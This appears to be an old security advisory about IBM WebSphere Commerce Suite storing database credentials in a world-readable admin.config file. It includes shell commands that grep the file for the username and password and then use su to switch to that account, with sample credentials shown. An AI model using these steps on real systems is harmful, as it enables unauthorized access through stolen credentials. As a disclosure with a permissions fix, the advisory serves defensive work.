Vulnerability
wcs
Affected
IBM WCS
Description
Following is based on a Chinansl Security Advisory CSA200013.
Vulnerable are found to be IBM WCS (Websphere Commerce Suite):
+ Sun OS
+ Sun Solaris
+ Microsoft Windows NT
+ Microsoft Windows 2000
+ HP HP-UX
+ IBM AIX
+ Linux
Chinansl security team has found a security problem in IBM WCS.
It is possible that a malicious local user can run arbitrary
command to get root right.
IBM WCS is bussiness suite. After install it, a file named
admin.config will be produced. The user name and password to
access that suite that connects database will be included in that
file. File access right is - rwxr-xr-x so local user can access
it and run some aibitrary command to get root right.
Examples for Sun OS 5.7:
$find admin.config |grep admin.config
/opt/WebSphere/AppServer/bin/admin.config
$cd /opt/WebSphere/AppServer/bin/
$grep dbUser admin.config
com.ibm.ejs.sm.adminServer.dbUser=db2admin
$grep dbPassword admin.config
com.ibm.ejs.sm.adminServer.dbPassword=ibmdb2
$su - db2admin
password:ibmdb2
$id
uid=db2adminID(db2admin)
Examples for WIN2000:
d:\waserver\bin\>more admin.config
com.ibm.ejs.sm.adminServer.dbUser=ad2admin
com.ibm.ejs.sm.adminServer.dbPassword=ad2admin
...
Solution
Config this product correctly and change permissions (not sure if
this breaks anything).